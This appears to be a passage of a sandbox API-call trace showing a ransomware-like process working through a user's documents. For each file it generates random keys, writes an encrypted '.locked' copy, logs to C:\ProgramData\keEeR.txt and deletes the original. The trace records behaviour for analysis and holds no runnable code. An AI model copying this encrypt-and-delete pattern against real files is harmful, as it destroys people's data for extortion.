(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\zMPTOdNQ.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\zmptodnq.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0285.716] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0285.716] WriteFile (in: hFile=0x230, lpBuffer=0x137b6000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x137b6000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0285.749] CloseHandle (hObject=0x230) returned 1 [0286.374] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0286.592] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0286.661] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0286.792] SetEvent (hEvent=0x198) returned 1 [0286.792] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0286.965] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0286.998] SetEvent (hEvent=0x22c) returned 1 [0286.998] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0287.095] SetEvent (hEvent=0x20c) returned 1 [0287.095] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0287.190] SetEvent (hEvent=0x14c) returned 1 [0287.190] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0287.456] SetEvent (hEvent=0x12c) returned 1 [0287.456] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0298.763] SetEvent (hEvent=0x104) returned 1 [0298.763] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0298.923] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc040*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x125fc040*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0299.097] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\00jJreyg.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\00jjreyg.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0299.098] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0299.098] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\00jJreyg.doc.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\00jjreyg.doc.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0299.547] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0299.738] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0299.738] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0299.760] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0299.760] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0299.760] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0299.761] WriteFile (in: hFile=0x1b0, lpBuffer=0x12749000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x12749000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0299.809] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x0 [0299.832] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0299.832] SetEvent (hEvent=0x150) returned 1 [0299.832] SetEvent (hEvent=0x104) returned 1 [0299.832] SetEvent (hEvent=0x220) returned 1 [0299.832] ReadFile (in: hFile=0x19c, lpBuffer=0x16148000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x16148000*, lpNumberOfBytesRead=0x1239dd68*=0x25c1, lpOverlapped=0x0) returned 1 [0299.833] WriteFile (in: hFile=0x1b0, lpBuffer=0x16148000*, nNumberOfBytesToWrite=0x25c1, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x16148000*, lpNumberOfBytesWritten=0x1239dd74*=0x25c1, lpOverlapped=0x0) returned 1 [0299.836] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0299.911] ReadFile (in: hFile=0x19c, lpBuffer=0x16148000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x16148000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0299.911] CloseHandle (hObject=0x1b0) returned 1 [0299.916] CloseHandle (hObject=0x19c) returned 1 [0299.916] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0299.916] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0299.916] WriteFile (in: hFile=0x19c, lpBuffer=0x126701c0*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x126701c0*, lpNumberOfBytesWritten=0x1239de64*=0x37, lpOverlapped=0x0) returned 1 [0299.916] CloseHandle (hObject=0x19c) returned 1 [0299.918] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\00jJreyg.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\00jjreyg.doc")) returned 1 [0299.964] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0299.976] SetEvent (hEvent=0x1dc) returned 1 [0299.976] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0299.977] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0300.064] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12611a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12611a24*=0xb) returned 1 [0300.072] SetEvent (hEvent=0x22c) returned 1 [0300.072] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0300.077] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0300.151] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0300.151] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0300.151] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0300.151] WriteFile (in: hFile=0x188, lpBuffer=0x125eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12663d78, lpOverlapped=0x0 | out: lpBuffer=0x125eb000*, lpNumberOfBytesWritten=0x12663d78*=0x80, lpOverlapped=0x0) returned 1 [0300.155] ReadFile (in: hFile=0x180, lpBuffer=0x13df6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x13df6000*, lpNumberOfBytesRead=0x12663d68*=0x62f0, lpOverlapped=0x0) returned 1 [0300.157] WriteFile (in: hFile=0x188, lpBuffer=0x13df6000*, nNumberOfBytesToWrite=0x62f0, lpNumberOfBytesWritten=0x12663d74, lpOverlapped=0x0 | out: lpBuffer=0x13df6000*, lpNumberOfBytesWritten=0x12663d74*=0x62f0, lpOverlapped=0x0) returned 1 [0300.324] ReadFile (in: hFile=0x180, lpBuffer=0x13df6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x13df6000*, lpNumberOfBytesRead=0x12663d68*=0x0, lpOverlapped=0x0) returned 1 [0300.324] CloseHandle (hObject=0x188) returned 1 [0300.430] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0300.605] CloseHandle (hObject=0x180) returned 1 [0300.605] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0300.606] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12663e94 | out: lpMode=0x12663e94) returned 0 [0300.606] WriteFile (in: hFile=0x180, lpBuffer=0x12380200*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x12663e64, lpOverlapped=0x0 | out: lpBuffer=0x12380200*, lpNumberOfBytesWritten=0x12663e64*=0x3d, lpOverlapped=0x0) returned 1 [0300.606] CloseHandle (hObject=0x180) returned 1 [0300.608] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\TP7qaB_8RwFo0zi2S F.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tp7qab_8rwfo0zi2s f.ods")) returned 1 [0300.671] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0302.065] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\TP7qaB_8RwFo0zi2S F.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tp7qab_8rwfo0zi2s f.ods"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0302.072] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0302.544] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12663e88 | out: lpMode=0x12663e88) returned 0 [0302.545] WriteFile (in: hFile=0x1e0, lpBuffer=0x13f48000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12663e78, lpOverlapped=0x0 | out: lpBuffer=0x13f48000*, lpNumberOfBytesWritten=0x12663e78*=0xfa000, lpOverlapped=0x0) returned 1 [0302.575] CloseHandle (hObject=0x1e0) returned 1 [0302.685] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0302.699] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0302.701] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0302.728] SetEvent (hEvent=0x1b8) returned 1 [0302.728] SetEvent (hEvent=0x12c) returned 1 [0302.728] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0303.046] SetEvent (hEvent=0x20c) returned 1 [0303.046] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0303.063] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0303.065] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\CJfBVMezWzfCMgvFYwf.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\cjfbvmezwzfcmgvfywf.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0303.065] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0303.065] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\CJfBVMezWzfCMgvFYwf.ots.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\cjfbvmezwzfcmgvfywf.ots.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0303.824] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0303.902] SetEvent (hEvent=0x150) returned 1 [0303.902] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0303.902] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.136] SetEvent (hEvent=0x190) returned 1 [0304.136] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.137] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.167] SetEvent (hEvent=0x190) returned 1 [0304.167] SetEvent (hEvent=0x22c) returned 1 [0304.167] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.178] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.188] SetEvent (hEvent=0x104) returned 1 [0304.189] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.302] SetEvent (hEvent=0x104) returned 1 [0304.302] SetEvent (hEvent=0x20c) returned 1 [0304.302] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.331] SetEvent (hEvent=0x104) returned 1 [0304.331] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.336] SetEvent (hEvent=0x1f0) returned 1 [0304.336] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.410] SetEvent (hEvent=0x20c) returned 1 [0304.410] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.420] SetEvent (hEvent=0x214) returned 1 [0304.420] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.497] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\8BJrk8.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\8bjrk8.pps"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0304.661] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.719] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0304.719] SetEvent (hEvent=0x214) returned 1 [0304.719] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.733] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.736] SetEvent (hEvent=0x134) returned 1 [0304.761] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x102 [0304.764] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.764] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0304.764] SetEvent (hEvent=0x150) returned 1 [0304.764] SetEvent (hEvent=0x190) returned 1 [0304.764] SetEvent (hEvent=0x134) returned 1 [0304.764] SetEvent (hEvent=0x214) returned 1 [0304.770] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x102 [0304.772] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.772] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x0 [0304.772] SetEvent (hEvent=0x12c) returned 1 [0304.772] SetEvent (hEvent=0x1ac) returned 1 [0304.772] SetEvent (hEvent=0x1dc) returned 1 [0304.772] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.773] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb34, ulCount=0x10, ulNumEntriesRemoved=0x340afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb34, ulNumEntriesRemoved=0x340afb14) returned 0 [0304.773] SetEvent (hEvent=0x150) returned 1 [0304.773] SetEvent (hEvent=0x1dc) returned 1 [0304.773] SetEvent (hEvent=0x1ac) returned 1 [0304.776] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\O4XyZ4ZdDUL8nyTp.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\o4xyz4zddul8nytp.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0304.797] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.807] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1239fe88 | out: lpMode=0x1239fe88) returned 0 [0304.807] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.868] SetEvent (hEvent=0x14c) returned 1 [0304.868] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0304.886] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0304.887] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1235fe94 | out: lpMode=0x1235fe94) returned 0 [0304.887] WriteFile (in: hFile=0x1bc, lpBuffer=0x125ec0a0*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x1235fe64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0a0*, lpNumberOfBytesWritten=0x1235fe64*=0x47, lpOverlapped=0x0) returned 1 [0304.887] CloseHandle (hObject=0x1bc) returned 1 [0304.888] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\vTjM.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vtjm.rtf")) returned 1 [0305.021] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0305.549] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\vTjM.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vtjm.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0305.768] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0305.954] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1235fe88 | out: lpMode=0x1235fe88) returned 0 [0305.954] WriteFile (in: hFile=0x180, lpBuffer=0x13d62000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1235fe78, lpOverlapped=0x0 | out: lpBuffer=0x13d62000*, lpNumberOfBytesWritten=0x1235fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.977] CloseHandle (hObject=0x180) returned 1 [0306.034] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.066] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.067] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.069] SetEvent (hEvent=0x1f0) returned 1 [0306.069] SetEvent (hEvent=0x134) returned 1 [0306.069] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.236] SetEvent (hEvent=0x12c) returned 1 [0306.236] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.254] SetEvent (hEvent=0x1f0) returned 1 [0306.254] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.366] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x12390020*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0306.375] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\eo3LI.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eo3li.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0306.375] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0306.375] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\eo3LI.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eo3li.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0306.375] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0306.377] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390040 | out: pbBuffer=0x12390040) returned 1 [0306.378] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0306.378] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0306.378] WriteFile (in: hFile=0x1e0, lpBuffer=0x124a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x124a7000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0306.382] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x0 [0306.384] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0306.385] SetEvent (hEvent=0x150) returned 1 [0306.385] SetEvent (hEvent=0x1e8) returned 1 [0306.385] SetEvent (hEvent=0x12c) returned 1 [0306.385] SetEvent (hEvent=0x1dc) returned 1 [0306.385] ReadFile (in: hFile=0x1c0, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1239dd68*=0x1597f, lpOverlapped=0x0) returned 1 [0306.388] WriteFile (in: hFile=0x1e0, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x1597f, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1239dd74*=0x1597f, lpOverlapped=0x0) returned 1 [0306.395] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.467] SetEvent (hEvent=0x150) returned 1 [0306.467] SetEvent (hEvent=0x1ac) returned 1 [0306.467] ReadFile (in: hFile=0x1c0, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0306.467] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0306.780] CloseHandle (hObject=0x1e0) returned 1 [0306.785] CloseHandle (hObject=0x1c0) returned 1 [0306.785] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0306.785] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0306.785] WriteFile (in: hFile=0x1c0, lpBuffer=0x12348210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x12348210*, lpNumberOfBytesWritten=0x1239de64*=0x30, lpOverlapped=0x0) returned 1 [0306.785] CloseHandle (hObject=0x1c0) returned 1 [0306.786] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\eo3LI.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eo3li.docx")) returned 1 [0306.940] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x0 [0306.943] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0306.943] SetEvent (hEvent=0x134) returned 1 [0306.976] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\eo3LI.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eo3li.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0306.991] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0307.094] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x124a1e88 | out: lpMode=0x124a1e88) returned 0 [0307.094] SetEvent (hEvent=0x1b8) returned 1 [0307.094] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0307.111] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0307.195] SetEvent (hEvent=0x1f0) returned 1 [0307.196] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\scXDc.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\scxdc.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0307.196] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0307.196] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\scXDc.xlsx.locked" (normalized: 